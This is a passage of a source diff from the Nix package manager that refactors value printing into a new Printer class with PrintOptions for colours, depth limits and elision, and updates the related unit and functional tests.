"; - str << "]"; - break; - - case nFunction: - if (v.isLambda()) { - std::ostringstream s; - s << state->positions[v.lambda.fun->pos]; - str << ANSI_BLUE "«lambda @ " << filterANSIEscapes(s.str()) << "»" ANSI_NORMAL; - } else if (v.isPrimOp()) { - str << ANSI_MAGENTA "«primop»" ANSI_NORMAL; - } else if (v.isPrimOpApp()) { - str << ANSI_BLUE "«primop-app»" ANSI_NORMAL; - } else { - abort(); - } - break; - - case nFloat: - str << v.fpoint; - break; - - case nThunk: - case nExternal: - default: - str << ANSI_RED "«unknown»" ANSI_NORMAL; - break; - } - - return str; -} - - std::unique_ptr AbstractNixRepl::create( const SearchPath & searchPath, nix::ref store, ref state, std::function getValues) diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc index d408f1adc..0659a2173 100644 --- a/src/libexpr/eval.cc +++ b/src/libexpr/eval.cc @@ -105,117 +105,23 @@ RootValue allocRootValue(Value * v) #endif } -void Value::print(const SymbolTable &symbols, std::ostream &str, - std::set *seen, int depth) const - -{ - checkInterrupt(); - - if (depth <= 0) { - str << "«too deep»"; - return; - } - switch (internalType) { - case tInt: - str << integer; - break; - case tBool: - printLiteralBool(str, boolean); - break; - case tString: - printLiteralString(str, string_view()); - break; - case tPath: - str << path().to_string(); // !!! escaping? 
- break; - case tNull: - str << "null"; - break; - case tAttrs: { - if (seen && !attrs->empty() && !seen->insert(attrs).second) - str << "«repeated»"; - else { - str << "{ "; - for (auto & i : attrs->lexicographicOrder(symbols)) { - str << symbols[i->name] << " = "; - i->value->print(symbols, str, seen, depth - 1); - str << "; "; - } - str << "}"; - } - break; - } - case tList1: - case tList2: - case tListN: - if (seen && listSize() && !seen->insert(listElems()).second) - str << "«repeated»"; - else { - str << "[ "; - for (auto v2 : listItems()) { - if (v2) - v2->print(symbols, str, seen, depth - 1); - else - str << "(nullptr)"; - str << " "; - } - str << "]"; - } - break; - case tThunk: - case tApp: - if (!isBlackhole()) { - str << ""; - } else { - // Although we know for sure that it's going to be an infinite recursion - // when this value is accessed _in the current context_, it's likely - // that the user will misinterpret a simpler «infinite recursion» output - // as a definitive statement about the value, while in fact it may be - // a valid value after `builtins.trace` and perhaps some other steps - // have completed. - str << "«potential infinite recursion»"; - } - break; - case tLambda: - str << ""; - break; - case tPrimOp: - str << ""; - break; - case tPrimOpApp: - str << ""; - break; - case tExternal: - str << *external; - break; - case tFloat: - str << fpoint; - break; - default: - printError("Nix evaluator internal error: Value::print(): invalid value type %1%", internalType); - abort(); - } -} - -void Value::print(const SymbolTable &symbols, std::ostream &str, - bool showRepeated, int depth) const { - std::set seen; - print(symbols, str, showRepeated ? 
nullptr : &seen, depth); -} - // Pretty print types for assertion errors std::ostream & operator << (std::ostream & os, const ValueType t) { os << showType(t); return os; } -std::string printValue(const EvalState & state, const Value & v) +std::string printValue(EvalState & state, Value & v) { std::ostringstream out; - v.print(state.symbols, out); + v.print(state, out); return out.str(); } +void Value::print(EvalState & state, std::ostream & str, PrintOptions options) +{ + printValue(state, str, *this, options); +} const Value * getPrimOp(const Value &v) { const Value * primOp = &v; @@ -710,6 +616,26 @@ void PrimOp::check() } +std::ostream & operator<<(std::ostream & output, PrimOp & primOp) +{ + output << "primop " << primOp.name; + return output; +} + + +PrimOp * Value::primOpAppPrimOp() const +{ + Value * left = primOpApp.left; + while (left && !left->isPrimOp()) { + left = left->primOpApp.left; + } + + if (!left) + return nullptr; + return left->primOp; +} + + void Value::mkPrimOp(PrimOp * p) { p->check(); diff --git a/src/libexpr/eval.hh b/src/libexpr/eval.hh index 5e0f1886d..9141156b1 100644 --- a/src/libexpr/eval.hh +++ b/src/libexpr/eval.hh @@ -84,6 +84,8 @@ struct PrimOp void check(); }; +std::ostream & operator<<(std::ostream & output, PrimOp & primOp); + /** * Info about a constant */ @@ -127,7 +129,7 @@ std::unique_ptr mapStaticEnvBindings(const SymbolTable & st, const Stati void copyContext(const Value & v, NixStringContext & context); -std::string printValue(const EvalState & state, const Value & v); +std::string printValue(EvalState & state, Value & v); std::ostream & operator << (std::ostream & os, const ValueType t); diff --git a/src/libexpr/print-options.hh b/src/libexpr/print-options.hh new file mode 100644 index 000000000..11ff9ae87 --- /dev/null +++ b/src/libexpr/print-options.hh @@ -0,0 +1,52 @@ +#pragma once +/** + * @file + * @brief Options for printing Nix values. 
+ */ + +#include + +namespace nix { + +/** + * Options for printing Nix values. + */ +struct PrintOptions +{ + /** + * If true, output ANSI color sequences. + */ + bool ansiColors = false; + /** + * If true, force values. + */ + bool force = false; + /** + * If true and `force` is set, print derivations as + * `«derivation /nix/store/...»` instead of as attribute sets. + */ + bool derivationPaths = false; + /** + * If true, track which values have been printed and skip them on + * subsequent encounters. Useful for self-referential values. + */ + bool trackRepeated = true; + /** + * Maximum depth to evaluate to. + */ + size_t maxDepth = std::numeric_limits::max(); + /** + * Maximum number of attributes in an attribute set to print. + */ + size_t maxAttrs = std::numeric_limits::max(); + /** + * Maximum number of list items to print. + */ + size_t maxListItems = std::numeric_limits::max(); + /** + * Maximum string length to print. + */ + size_t maxStringLength = std::numeric_limits::max(); +}; + +} diff --git a/src/libexpr/print.cc b/src/libexpr/print.cc index 53ba70bdd..db26ed4c2 100644 --- a/src/libexpr/print.cc +++ b/src/libexpr/print.cc @@ -1,24 +1,66 @@ -#include "print.hh" +#include #include +#include "print.hh" +#include "ansicolor.hh" +#include "signals.hh" +#include "store-api.hh" +#include "terminal.hh" +#include "english.hh" + namespace nix { -std::ostream & -printLiteralString(std::ostream & str, const std::string_view string) +void printElided( + std::ostream & output, + unsigned int value, + const std::string_view single, + const std::string_view plural, + bool ansiColors) { + if (ansiColors) + output << ANSI_FAINT; + output << " «"; + pluralize(output, value, single, plural); + output << " elided»"; + if (ansiColors) + output << ANSI_NORMAL; +} + + +std::ostream & +printLiteralString(std::ostream & str, const std::string_view string, size_t maxLength, bool ansiColors) +{ + size_t charsPrinted = 0; + if (ansiColors) + str << ANSI_MAGENTA; str << "\""; 
for (auto i = string.begin(); i != string.end(); ++i) { + if (charsPrinted >= maxLength) { + str << "\""; + printElided(str, string.length() - charsPrinted, "byte", "bytes", ansiColors); + return str; + } + if (*i == '\"' || *i == '\\') str << "\\" << *i; else if (*i == '\n') str << "\\n"; else if (*i == '\r') str << "\\r"; else if (*i == '\t') str << "\\t"; else if (*i == '$' && *(i+1) == '{') str << "\\" << *i; else str << *i; + charsPrinted++; } str << "\""; + if (ansiColors) + str << ANSI_NORMAL; return str; } +std::ostream & +printLiteralString(std::ostream & str, const std::string_view string) +{ + return printLiteralString(str, string, std::numeric_limits::max(), false); +} + std::ostream & printLiteralBool(std::ostream & str, bool boolean) { @@ -90,5 +132,373 @@ printAttributeName(std::ostream & str, std::string_view name) { return str; } +bool isImportantAttrName(const std::string& attrName) +{ + return attrName == "type" || attrName == "_type"; +} + +typedef std::pair AttrPair; + +struct ImportantFirstAttrNameCmp +{ + + bool operator()(const AttrPair& lhs, const AttrPair& rhs) const + { + auto lhsIsImportant = isImportantAttrName(lhs.first); + auto rhsIsImportant = isImportantAttrName(rhs.first); + return std::forward_as_tuple(!lhsIsImportant, lhs.first) + < std::forward_as_tuple(!rhsIsImportant, rhs.first); + } +}; + +typedef std::set ValuesSeen; + +class Printer +{ +private: + std::ostream & output; + EvalState & state; + PrintOptions options; + std::optional seen; + + void printRepeated() + { + if (options.ansiColors) + output << ANSI_MAGENTA; + output << "«repeated»"; + if (options.ansiColors) + output << ANSI_NORMAL; + } + + void printNullptr() + { + if (options.ansiColors) + output << ANSI_MAGENTA; + output << "«nullptr»"; + if (options.ansiColors) + output << ANSI_NORMAL; + } + + void printElided(unsigned int value, const std::string_view single, const std::string_view plural) + { + ::nix::printElided(output, value, single, plural, 
options.ansiColors); + } + + void printInt(Value & v) + { + if (options.ansiColors) + output << ANSI_CYAN; + output << v.integer; + if (options.ansiColors) + output << ANSI_NORMAL; + } + + void printFloat(Value & v) + { + if (options.ansiColors) + output << ANSI_CYAN; + output << v.fpoint; + if (options.ansiColors) + output << ANSI_NORMAL; + } + + void printBool(Value & v) + { + if (options.ansiColors) + output << ANSI_CYAN; + printLiteralBool(output, v.boolean); + if (options.ansiColors) + output << ANSI_NORMAL; + } + + void printString(Value & v) + { + printLiteralString(output, v.string_view(), options.maxStringLength, options.ansiColors); + } + + void printPath(Value & v) + { + if (options.ansiColors) + output << ANSI_GREEN; + output << v.path().to_string(); // !!! escaping? + if (options.ansiColors) + output << ANSI_NORMAL; + } + + void printNull() + { + if (options.ansiColors) + output << ANSI_CYAN; + output << "null"; + if (options.ansiColors) + output << ANSI_NORMAL; + } + + void printDerivation(Value & v) + { + try { + Bindings::iterator i = v.attrs->find(state.sDrvPath); + NixStringContext context; + std::string storePath; + if (i != v.attrs->end()) + storePath = state.store->printStorePath(state.coerceToStorePath(i->pos, *i->value, context, "while evaluating the drvPath of a derivation")); + + if (options.ansiColors) + output << ANSI_GREEN; + output << "«derivation"; + if (!storePath.empty()) { + output << " " << storePath; + } + output << "»"; + if (options.ansiColors) + output << ANSI_NORMAL; + } catch (BaseError & e) { + printError_(e); + } + } + + void printAttrs(Value & v, size_t depth) + { + if (seen && !seen->insert(&v).second) { + printRepeated(); + return; + } + + if (options.force && options.derivationPaths && state.isDerivation(v)) { + printDerivation(v); + } else if (depth < options.maxDepth) { + output << "{ "; + + std::vector> sorted; + for (auto & i : *v.attrs) + sorted.emplace_back(std::pair(state.symbols[i.name], i.value)); + + if 
(options.maxAttrs == std::numeric_limits::max()) + std::sort(sorted.begin(), sorted.end()); + else + std::sort(sorted.begin(), sorted.end(), ImportantFirstAttrNameCmp()); + + size_t attrsPrinted = 0; + for (auto & i : sorted) { + if (attrsPrinted >= options.maxAttrs) { + printElided(sorted.size() - attrsPrinted, "attribute", "attributes"); + break; + } + + printAttributeName(output, i.first); + output << " = "; + print(*i.second, depth + 1); + output << "; "; + attrsPrinted++; + } + + output << "}"; + } else + output << "{ ... }"; + } + + void printList(Value & v, size_t depth) + { + if (seen && v.listSize() && !seen->insert(&v).second) { + printRepeated(); + return; + } + + output << "[ "; + if (depth < options.maxDepth) { + size_t listItemsPrinted = 0; + for (auto elem : v.listItems()) { + if (listItemsPrinted >= options.maxListItems) { + printElided(v.listSize() - listItemsPrinted, "item", "items"); + break; + } + + if (elem) { + print(*elem, depth + 1); + } else { + printNullptr(); + } + output << " "; + listItemsPrinted++; + } + } + else + output << "... 
"; + output << "]"; + } + + void printFunction(Value & v) + { + if (options.ansiColors) + output << ANSI_BLUE; + output << "«"; + + if (v.isLambda()) { + output << "lambda"; + if (v.lambda.fun) { + if (v.lambda.fun->name) { + output << " " << state.symbols[v.lambda.fun->name]; + } + + std::ostringstream s; + s << state.positions[v.lambda.fun->pos]; + output << " @ " << filterANSIEscapes(s.str()); + } + } else if (v.isPrimOp()) { + if (v.primOp) + output << *v.primOp; + else + output << "primop"; + } else if (v.isPrimOpApp()) { + output << "partially applied "; + auto primOp = v.primOpAppPrimOp(); + if (primOp) + output << *primOp; + else + output << "primop"; + } else { + abort(); + } + + output << "»"; + if (options.ansiColors) + output << ANSI_NORMAL; + } + + void printThunk(Value & v) + { + if (v.isBlackhole()) { + // Although we know for sure that it's going to be an infinite recursion + // when this value is accessed _in the current context_, it's likely + // that the user will misinterpret a simpler «infinite recursion» output + // as a definitive statement about the value, while in fact it may be + // a valid value after `builtins.trace` and perhaps some other steps + // have completed. 
+ if (options.ansiColors) + output << ANSI_RED; + output << "«potential infinite recursion»"; + if (options.ansiColors) + output << ANSI_NORMAL; + } else if (v.isThunk() || v.isApp()) { + if (options.ansiColors) + output << ANSI_MAGENTA; + output << "«thunk»"; + if (options.ansiColors) + output << ANSI_NORMAL; + } else { + abort(); + } + } + + void printExternal(Value & v) + { + v.external->print(output); + } + + void printUnknown() + { + if (options.ansiColors) + output << ANSI_RED; + output << "«unknown»"; + if (options.ansiColors) + output << ANSI_NORMAL; + } + + void printError_(BaseError & e) + { + if (options.ansiColors) + output << ANSI_RED; + output << "«" << e.msg() << "»"; + if (options.ansiColors) + output << ANSI_NORMAL; + } + + void print(Value & v, size_t depth) + { + output.flush(); + checkInterrupt(); + + if (options.force) { + try { + state.forceValue(v, v.determinePos(noPos)); + } catch (BaseError & e) { + printError_(e); + return; + } + } + + switch (v.type()) { + + case nInt: + printInt(v); + break; + + case nFloat: + printFloat(v); + break; + + case nBool: + printBool(v); + break; + + case nString: + printString(v); + break; + + case nPath: + printPath(v); + break; + + case nNull: + printNull(); + break; + + case nAttrs: + printAttrs(v, depth); + break; + + case nList: + printList(v, depth); + break; + + case nFunction: + printFunction(v); + break; + + case nThunk: + printThunk(v); + break; + + case nExternal: + printExternal(v); + break; + + default: + printUnknown(); + break; + } + } + +public: + Printer(std::ostream & output, EvalState & state, PrintOptions options) + : output(output), state(state), options(options) { } + + void print(Value & v) + { + if (options.trackRepeated) { + seen.emplace(); + } else { + seen.reset(); + } + + ValuesSeen seen; + print(v, 0); + } +}; + +void printValue(EvalState & state, std::ostream & output, Value & v, PrintOptions options) +{ + Printer(output, state, options).print(v); +} } diff --git 
a/src/libexpr/print.hh b/src/libexpr/print.hh index abf830864..40207d777 100644 --- a/src/libexpr/print.hh +++ b/src/libexpr/print.hh @@ -9,6 +9,9 @@ #include +#include "eval.hh" +#include "print-options.hh" + namespace nix { /** @@ -16,6 +19,7 @@ namespace nix { * * Quotes and fairly minimal escaping are added. * + * @param o The output stream to print to * @param s The logical string */ std::ostream & printLiteralString(std::ostream & o, std::string_view s); @@ -53,4 +57,6 @@ bool isReservedKeyword(const std::string_view str); */ std::ostream & printIdentifier(std::ostream & o, std::string_view s); +void printValue(EvalState & state, std::ostream & str, Value & v, PrintOptions options = PrintOptions {}); + } diff --git a/src/libexpr/value.hh b/src/libexpr/value.hh index c65b336b0..214d52271 100644 --- a/src/libexpr/value.hh +++ b/src/libexpr/value.hh @@ -9,6 +9,7 @@ #include "value/context.hh" #include "input-accessor.hh" #include "source-path.hh" +#include "print-options.hh" #if HAVE_BOEHMGC #include @@ -70,7 +71,7 @@ struct Pos; class StorePath; class EvalState; class XMLWriter; - +class Printer; typedef int64_t NixInt; typedef double NixFloat; @@ -82,6 +83,7 @@ typedef double NixFloat; class ExternalValueBase { friend std::ostream & operator << (std::ostream & str, const ExternalValueBase & v); + friend class Printer; protected: /** * Print out the value @@ -139,11 +141,9 @@ private: friend std::string showType(const Value & v); - void print(const SymbolTable &symbols, std::ostream &str, std::set *seen, int depth) const; - public: - void print(const SymbolTable &symbols, std::ostream &str, bool showRepeated = false, int depth = INT_MAX) const; + void print(EvalState &state, std::ostream &str, PrintOptions options = PrintOptions {}); // Functions needed to distinguish the type // These should be removed eventually, by putting the functionality that's @@ -364,10 +364,15 @@ public: inline void mkPrimOpApp(Value * l, Value * r) { internalType = tPrimOpApp; - 
app.left = l; - app.right = r; + primOpApp.left = l; + primOpApp.right = r; } + /** + * For a `tPrimOpApp` value, get the original `PrimOp` value. + */ + PrimOp * primOpAppPrimOp() const; + inline void mkExternal(ExternalValueBase * e) { clearValue(); diff --git a/src/libutil/english.cc b/src/libutil/english.cc new file mode 100644 index 000000000..8c93c9156 --- /dev/null +++ b/src/libutil/english.cc @@ -0,0 +1,18 @@ +#include "english.hh" + +namespace nix { + +std::ostream & pluralize( + std::ostream & output, + unsigned int count, + const std::string_view single, + const std::string_view plural) +{ + if (count == 1) + output << "1 " << single; + else + output << count << " " << plural; + return output; +} + +} diff --git a/src/libutil/english.hh b/src/libutil/english.hh new file mode 100644 index 000000000..9c6c93571 --- /dev/null +++ b/src/libutil/english.hh @@ -0,0 +1,18 @@ +#pragma once + +#include + +namespace nix { + +/** + * Pluralize a given value. + * + * If `count == 1`, prints `1 {single}` to `output`, otherwise prints `{count} {plural}`. + */ +std::ostream & pluralize( + std::ostream & output, + unsigned int count, + const std::string_view single, + const std::string_view plural); + +} diff --git a/src/nix-env/user-env.cc b/src/nix-env/user-env.cc index 9f4d063d2..3d07cab7a 100644 --- a/src/nix-env/user-env.cc +++ b/src/nix-env/user-env.cc @@ -8,6 +8,8 @@ #include "eval.hh" #include "eval-inline.hh" #include "profiles.hh" +#include "print-ambiguous.hh" +#include namespace nix { @@ -106,7 +108,8 @@ bool createUserEnv(EvalState & state, DrvInfos & elems, environment. */ auto manifestFile = ({ std::ostringstream str; - manifest.print(state.symbols, str, true); + std::set seen; + printAmbiguous(manifest, state.symbols, str, &seen, std::numeric_limits::max()); // TODO with C++20 we can use str.view() instead and avoid copy. 
std::string str2 = str.str(); StringSource source { str2 }; diff --git a/src/nix-instantiate/nix-instantiate.cc b/src/nix-instantiate/nix-instantiate.cc index ab590b3a6..9b36dccc6 100644 --- a/src/nix-instantiate/nix-instantiate.cc +++ b/src/nix-instantiate/nix-instantiate.cc @@ -56,7 +56,7 @@ void processExpr(EvalState & state, const Strings & attrPaths, std::cout << std::endl; } else { if (strict) state.forceValueDeep(vRes); - vRes.print(state.symbols, std::cout); + vRes.print(state, std::cout); std::cout << std::endl; } } else { diff --git a/tests/functional/lang/eval-okay-print.err.exp b/tests/functional/lang/eval-okay-print.err.exp index 3fc99be3e..80aa17c6e 100644 --- a/tests/functional/lang/eval-okay-print.err.exp +++ b/tests/functional/lang/eval-okay-print.err.exp @@ -1 +1 @@ -trace: [ ] +trace: [ «thunk» ] diff --git a/tests/functional/lang/eval-okay-print.exp b/tests/functional/lang/eval-okay-print.exp index 0d960fb70..aa1b2379e 100644 --- a/tests/functional/lang/eval-okay-print.exp +++ b/tests/functional/lang/eval-okay-print.exp @@ -1 +1 @@ -[ null [ [ «repeated» ] ] ] +[ null «primop toString» «partially applied primop deepSeq» «lambda @ /pwd/lang/eval-okay-print.nix:1:61» [ [ «repeated» ] ] ] diff --git a/tests/functional/lang/eval-okay-repeated-empty-attrs.exp b/tests/functional/lang/eval-okay-repeated-empty-attrs.exp new file mode 100644 index 000000000..d21e6db6b --- /dev/null +++ b/tests/functional/lang/eval-okay-repeated-empty-attrs.exp @@ -0,0 +1 @@ +[ { } { } ] diff --git a/tests/functional/lang/eval-okay-repeated-empty-attrs.nix b/tests/functional/lang/eval-okay-repeated-empty-attrs.nix new file mode 100644 index 000000000..030a3b85c --- /dev/null +++ b/tests/functional/lang/eval-okay-repeated-empty-attrs.nix @@ -0,0 +1,2 @@ +# Tests that empty attribute sets are not printed as `«repeated»`. 
+[ {} {} ] diff --git a/tests/functional/lang/eval-okay-repeated-empty-list.exp b/tests/functional/lang/eval-okay-repeated-empty-list.exp new file mode 100644 index 000000000..701fc7e20 --- /dev/null +++ b/tests/functional/lang/eval-okay-repeated-empty-list.exp @@ -0,0 +1 @@ +[ [ ] [ ] ] diff --git a/tests/functional/lang/eval-okay-repeated-empty-list.nix b/tests/functional/lang/eval-okay-repeated-empty-list.nix new file mode 100644 index 000000000..376c51be8 --- /dev/null +++ b/tests/functional/lang/eval-okay-repeated-empty-list.nix @@ -0,0 +1 @@ +[ [] [] ] diff --git a/tests/unit/libexpr/value/print.cc b/tests/unit/libexpr/value/print.cc index a4f6fc014..98131112e 100644 --- a/tests/unit/libexpr/value/print.cc +++ b/tests/unit/libexpr/value/print.cc @@ -1,6 +1,7 @@ #include "tests/libexpr.hh" #include "value.hh" +#include "print.hh" namespace nix { @@ -12,7 +13,7 @@ struct ValuePrintingTests : LibExprTest void test(Value v, std::string_view expected, A... args) { std::stringstream out; - v.print(state.symbols, out, args...); + v.print(state, out, args...); ASSERT_EQ(out.str(), expected); } }; @@ -84,7 +85,7 @@ TEST_F(ValuePrintingTests, tList) vList.bigList.elems[1] = &vTwo; vList.bigList.size = 3; - test(vList, "[ 1 2 (nullptr) ]"); + test(vList, "[ 1 2 «nullptr» ]"); } TEST_F(ValuePrintingTests, vThunk) @@ -92,7 +93,7 @@ TEST_F(ValuePrintingTests, vThunk) Value vThunk; vThunk.mkThunk(nullptr, nullptr); - test(vThunk, ""); + test(vThunk, "«thunk»"); } TEST_F(ValuePrintingTests, vApp) @@ -100,32 +101,55 @@ TEST_F(ValuePrintingTests, vApp) Value vApp; vApp.mkApp(nullptr, nullptr); - test(vApp, ""); + test(vApp, "«thunk»"); } TEST_F(ValuePrintingTests, vLambda) { - Value vLambda; - vLambda.mkLambda(nullptr, nullptr); + Env env { + .up = nullptr, + .values = { } + }; + PosTable::Origin origin((std::monostate())); + auto posIdx = state.positions.add(origin, 1, 1); + auto body = ExprInt(0); + auto formals = Formals {}; - test(vLambda, ""); + ExprLambda eLambda(posIdx, 
createSymbol("a"), &formals, &body); + + Value vLambda; + vLambda.mkLambda(&env, &eLambda); + + test(vLambda, "«lambda @ «none»:1:1»"); + + eLambda.setName(createSymbol("puppy")); + + test(vLambda, "«lambda puppy @ «none»:1:1»"); } TEST_F(ValuePrintingTests, vPrimOp) { Value vPrimOp; - PrimOp primOp{}; + PrimOp primOp{ + .name = "puppy" + }; vPrimOp.mkPrimOp(&primOp); - test(vPrimOp, ""); + test(vPrimOp, "«primop puppy»"); } TEST_F(ValuePrintingTests, vPrimOpApp) { - Value vPrimOpApp; - vPrimOpApp.mkPrimOpApp(nullptr, nullptr); + PrimOp primOp{ + .name = "puppy" + }; + Value vPrimOp; + vPrimOp.mkPrimOp(&primOp); - test(vPrimOpApp, ""); + Value vPrimOpApp; + vPrimOpApp.mkPrimOpApp(&vPrimOp, nullptr); + + test(vPrimOpApp, "«partially applied primop puppy»"); } TEST_F(ValuePrintingTests, vExternal) @@ -176,9 +200,14 @@ TEST_F(ValuePrintingTests, depthAttrs) Value vTwo; vTwo.mkInt(2); + BindingsBuilder builderEmpty(state, state.allocBindings(0)); + Value vAttrsEmpty; + vAttrsEmpty.mkAttrs(builderEmpty.finish()); + BindingsBuilder builder(state, state.allocBindings(10)); builder.insert(state.symbols.create("one"), &vOne); builder.insert(state.symbols.create("two"), &vTwo); + builder.insert(state.symbols.create("nested"), &vAttrsEmpty); Value vAttrs; vAttrs.mkAttrs(builder.finish()); @@ -191,10 +220,10 @@ TEST_F(ValuePrintingTests, depthAttrs) Value vNested; vNested.mkAttrs(builder2.finish()); - test(vNested, "{ nested = «too deep»; one = «too deep»; two = «too deep»; }", false, 1); - test(vNested, "{ nested = { one = «too deep»; two = «too deep»; }; one = 1; two = 2; }", false, 2); - test(vNested, "{ nested = { one = 1; two = 2; }; one = 1; two = 2; }", false, 3); - test(vNested, "{ nested = { one = 1; two = 2; }; one = 1; two = 2; }", false, 4); + test(vNested, "{ nested = { ... }; one = 1; two = 2; }", PrintOptions { .maxDepth = 1 }); + test(vNested, "{ nested = { nested = { ... 
}; one = 1; two = 2; }; one = 1; two = 2; }", PrintOptions { .maxDepth = 2 }); + test(vNested, "{ nested = { nested = { }; one = 1; two = 2; }; one = 1; two = 2; }", PrintOptions { .maxDepth = 3 }); + test(vNested, "{ nested = { nested = { }; one = 1; two = 2; }; one = 1; two = 2; }", PrintOptions { .maxDepth = 4 }); } TEST_F(ValuePrintingTests, depthList) @@ -227,11 +256,561 @@ TEST_F(ValuePrintingTests, depthList) vList.bigList.elems[2] = &vNested; vList.bigList.size = 3; - test(vList, "[ «too deep» «too deep» «too deep» ]", false, 1); - test(vList, "[ 1 2 { nested = «too deep»; one = «too deep»; two = «too deep»; } ]", false, 2); - test(vList, "[ 1 2 { nested = { one = «too deep»; two = «too deep»; }; one = 1; two = 2; } ]", false, 3); - test(vList, "[ 1 2 { nested = { one = 1; two = 2; }; one = 1; two = 2; } ]", false, 4); - test(vList, "[ 1 2 { nested = { one = 1; two = 2; }; one = 1; two = 2; } ]", false, 5); + test(vList, "[ 1 2 { ... } ]", PrintOptions { .maxDepth = 1 }); + test(vList, "[ 1 2 { nested = { ... }; one = 1; two = 2; } ]", PrintOptions { .maxDepth = 2 }); + test(vList, "[ 1 2 { nested = { one = 1; two = 2; }; one = 1; two = 2; } ]", PrintOptions { .maxDepth = 3 }); + test(vList, "[ 1 2 { nested = { one = 1; two = 2; }; one = 1; two = 2; } ]", PrintOptions { .maxDepth = 4 }); + test(vList, "[ 1 2 { nested = { one = 1; two = 2; }; one = 1; two = 2; } ]", PrintOptions { .maxDepth = 5 }); +} + +struct StringPrintingTests : LibExprTest +{ + template + void test(std::string_view literal, std::string_view expected, unsigned int maxLength, A... 
args) + { + Value v; + v.mkString(literal); + + std::stringstream out; + printValue(state, out, v, PrintOptions { + .maxStringLength = maxLength + }); + ASSERT_EQ(out.str(), expected); + } +}; + +TEST_F(StringPrintingTests, maxLengthTruncation) +{ + test("abcdefghi", "\"abcdefghi\"", 10); + test("abcdefghij", "\"abcdefghij\"", 10); + test("abcdefghijk", "\"abcdefghij\" «1 byte elided»", 10); + test("abcdefghijkl", "\"abcdefghij\" «2 bytes elided»", 10); + test("abcdefghijklm", "\"abcdefghij\" «3 bytes elided»", 10); +} + +// Check that printing an attrset shows 'important' attributes like `type` +// first, but only reorder the attrs when we have a maxAttrs budget. +TEST_F(ValuePrintingTests, attrsTypeFirst) +{ + Value vType; + vType.mkString("puppy"); + + Value vApple; + vApple.mkString("apple"); + + BindingsBuilder builder(state, state.allocBindings(10)); + builder.insert(state.symbols.create("type"), &vType); + builder.insert(state.symbols.create("apple"), &vApple); + + Value vAttrs; + vAttrs.mkAttrs(builder.finish()); + + test(vAttrs, + "{ type = \"puppy\"; apple = \"apple\"; }", + PrintOptions { + .maxAttrs = 100 + }); + + test(vAttrs, + "{ apple = \"apple\"; type = \"puppy\"; }", + PrintOptions { }); +} + +TEST_F(ValuePrintingTests, ansiColorsInt) +{ + Value v; + v.mkInt(10); + + test(v, + ANSI_CYAN "10" ANSI_NORMAL, + PrintOptions { + .ansiColors = true + }); +} + +TEST_F(ValuePrintingTests, ansiColorsFloat) +{ + Value v; + v.mkFloat(1.6); + + test(v, + ANSI_CYAN "1.6" ANSI_NORMAL, + PrintOptions { + .ansiColors = true + }); +} + +TEST_F(ValuePrintingTests, ansiColorsBool) +{ + Value v; + v.mkBool(true); + + test(v, + ANSI_CYAN "true" ANSI_NORMAL, + PrintOptions { + .ansiColors = true + }); +} + +TEST_F(ValuePrintingTests, ansiColorsString) +{ + Value v; + v.mkString("puppy"); + + test(v, + ANSI_MAGENTA "\"puppy\"" ANSI_NORMAL, + PrintOptions { + .ansiColors = true + }); +} + +TEST_F(ValuePrintingTests, ansiColorsStringElided) +{ + Value v; + 
v.mkString("puppy"); + + test(v, + ANSI_MAGENTA "\"pup\"" ANSI_FAINT " «2 bytes elided»" ANSI_NORMAL, + PrintOptions { + .ansiColors = true, + .maxStringLength = 3 + }); +} + +TEST_F(ValuePrintingTests, ansiColorsPath) +{ + Value v; + v.mkPath(state.rootPath(CanonPath("puppy"))); + + test(v, + ANSI_GREEN "/puppy" ANSI_NORMAL, + PrintOptions { + .ansiColors = true + }); +} + +TEST_F(ValuePrintingTests, ansiColorsNull) +{ + Value v; + v.mkNull(); + + test(v, + ANSI_CYAN "null" ANSI_NORMAL, + PrintOptions { + .ansiColors = true + }); +} + +TEST_F(ValuePrintingTests, ansiColorsAttrs) +{ + Value vOne; + vOne.mkInt(1); + + Value vTwo; + vTwo.mkInt(2); + + BindingsBuilder builder(state, state.allocBindings(10)); + builder.insert(state.symbols.create("one"), &vOne); + builder.insert(state.symbols.create("two"), &vTwo); + + Value vAttrs; + vAttrs.mkAttrs(builder.finish()); + + test(vAttrs, + "{ one = " ANSI_CYAN "1" ANSI_NORMAL "; two = " ANSI_CYAN "2" ANSI_NORMAL "; }", + PrintOptions { + .ansiColors = true + }); +} + +TEST_F(ValuePrintingTests, ansiColorsDerivation) +{ + Value vDerivation; + vDerivation.mkString("derivation"); + + BindingsBuilder builder(state, state.allocBindings(10)); + builder.insert(state.sType, &vDerivation); + + Value vAttrs; + vAttrs.mkAttrs(builder.finish()); + + test(vAttrs, + ANSI_GREEN "«derivation»" ANSI_NORMAL, + PrintOptions { + .ansiColors = true, + .force = true, + .derivationPaths = true + }); + + test(vAttrs, + "{ type = " ANSI_MAGENTA "\"derivation\"" ANSI_NORMAL "; }", + PrintOptions { + .ansiColors = true, + .force = true + }); +} + +TEST_F(ValuePrintingTests, ansiColorsError) +{ + Value throw_ = state.getBuiltin("throw"); + Value message; + message.mkString("uh oh!"); + Value vError; + vError.mkApp(&throw_, &message); + + test(vError, + ANSI_RED + "«" + ANSI_RED + "error:" + ANSI_NORMAL + "\n … while calling the '" + ANSI_MAGENTA + "throw" + ANSI_NORMAL + "' builtin\n\n " + ANSI_RED + "error:" + ANSI_NORMAL + " uh oh!»" + 
ANSI_NORMAL, + PrintOptions { + .ansiColors = true, + .force = true, + }); +} + +TEST_F(ValuePrintingTests, ansiColorsDerivationError) +{ + Value throw_ = state.getBuiltin("throw"); + Value message; + message.mkString("uh oh!"); + Value vError; + vError.mkApp(&throw_, &message); + + Value vDerivation; + vDerivation.mkString("derivation"); + + BindingsBuilder builder(state, state.allocBindings(10)); + builder.insert(state.sType, &vDerivation); + builder.insert(state.sDrvPath, &vError); + + Value vAttrs; + vAttrs.mkAttrs(builder.finish()); + + test(vAttrs, + "{ drvPath = " + ANSI_RED + "«" + ANSI_RED + "error:" + ANSI_NORMAL + "\n … while calling the '" + ANSI_MAGENTA + "throw" + ANSI_NORMAL + "' builtin\n\n " + ANSI_RED + "error:" + ANSI_NORMAL + " uh oh!»" + ANSI_NORMAL + "; type = " + ANSI_MAGENTA + "\"derivation\"" + ANSI_NORMAL + "; }", + PrintOptions { + .ansiColors = true, + .force = true + }); + + test(vAttrs, + ANSI_RED + "«" + ANSI_RED + "error:" + ANSI_NORMAL + "\n … while calling the '" + ANSI_MAGENTA + "throw" + ANSI_NORMAL + "' builtin\n\n " + ANSI_RED + "error:" + ANSI_NORMAL + " uh oh!»" + ANSI_NORMAL, + PrintOptions { + 